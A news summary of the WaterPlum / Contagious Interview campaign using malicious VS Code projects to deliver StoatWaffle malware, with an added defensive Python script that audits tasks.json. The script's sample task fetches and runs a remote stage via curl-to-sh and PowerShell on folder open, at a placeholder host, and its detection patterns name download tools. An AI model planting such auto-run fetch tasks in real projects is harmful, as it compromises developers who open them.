North Korean threat operation WaterPlum, which runs the Contagious Interview campaign, has leveraged malicious VS Code projects to deliver the new StoatWaffle malware since December, reports The Hacker News.
Installing the illicit repository in VS Code triggers the reading of its tasks.json file, which downloads data from a Vercel web app regardless of the host operating system, findings from NTT Security researchers showed. After confirming that Node.js is present in the targeted environment, the payload launches a downloader that retrieves StoatWaffle, which injects both a stealer module, exfiltrating browser-stored credentials and extension data and, on macOS, the iCloud Keychain database, and a remote access trojan. Such findings come as North Korean hackers were reported by Microsoft researchers to have harnessed seemingly legitimate recruitment processes to spread the OtterCookie, InvisibleFerret, and FlexibleFerret backdoors as part of the Contagious Interview campaign. "By embedding targeted malware delivery directly into interview tools, coding exercises, and assessment workflows developers inherently trust, threat actors exploit the trust job seekers place in the hiring process during periods of high motivation and time pressure, lowering suspicion and resistance," said Microsoft.
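The delivery mechanism described above, a VS Code project whose tasks.json reaches out to a remote host when the folder is opened, can be screened for before a candidate repository is ever opened in the editor. The following audit script is an added example and is not code from the article, NTT Security, or Microsoft; the sample tasks.json it inspects is constructed, the URL example.invalid is a placeholder, and the heuristics (flagging tasks configured with `runOptions.runOn: "folderOpen"` whose command or arguments reference a URL or common download tooling) are this example's own assumptions rather than published indicators.

```python
"""Audit a VS Code tasks.json for tasks that auto-run on folder open and touch the network."""
import json
import re

# Heuristics are assumptions for this example, not indicators published by NTT or Microsoft.
NETWORK_TOOLS = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|node\s+-e|npx|bash\s+-c|sh\s+-c)\b", re.I
)
URL_PATTERN = re.compile(r"https?://[^\s\"']+", re.I)

# Constructed sample: one ordinary build task and one task shaped like the article's description.
SAMPLE_TASKS_JSON = """{
  // tasks.json allows comments; this audit strips line comments before parsing
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build"
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s https://example.invalid/stage1 | sh",
      "windows": { "command": "powershell -c \\"iwr https://example.invalid/stage1 -OutFile s.ps1; ./s.ps1\\"" },
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}"""


def _task_command(task: dict) -> str:
    """Collect command and args, including per-OS overrides, into one searchable string."""
    chunks = []
    for scope in (task, task.get("windows"), task.get("linux"), task.get("osx")):
        if not isinstance(scope, dict):
            continue
        cmd = scope.get("command", "")
        chunks.append(cmd if isinstance(cmd, str) else str(cmd.get("value", "")))
        for arg in scope.get("args", []):
            chunks.append(arg if isinstance(arg, str) else str(arg.get("value", "")))
    return " ".join(chunks)


def audit_tasks_json(text: str) -> list[dict]:
    """Return one finding per task that auto-runs on folderOpen and references the network."""
    # VS Code's tasks.json is JSONC; drop whole-line // comments so json.loads accepts it.
    cleaned = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    findings = []
    for task in json.loads(cleaned).get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        command = _task_command(task)
        urls = sorted(set(URL_PATTERN.findall(command)))
        tools = sorted({m.group(1).lower() for m in NETWORK_TOOLS.finditer(command)})
        reasons = []
        if run_on == "folderOpen":
            reasons.append("auto-runs when the folder is opened")
        if urls:
            reasons.append("references remote URL(s): " + ", ".join(urls))
        if tools:
            reasons.append("invokes network/download tooling: " + ", ".join(tools))
        # Only the combination of auto-run plus network activity is reported.
        if run_on == "folderOpen" and (urls or tools):
            findings.append({"label": task.get("label", "<unnamed>"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_tasks_json(SAMPLE_TASKS_JSON):
        print(f"task {finding['label']!r}:")
        for reason in finding["reasons"]:
            print("  -", reason)
```

Running the script prints the `setup` task with all three reasons while the `build` task stays silent. Per-OS overrides are searched deliberately, since a task can carry a benign top-level command and hide the fetch in its `windows`, `linux` or `osx` block; the same check can be pointed at `.vscode/tasks.json` in any repository received as part of a hiring exercise before opening it in the editor.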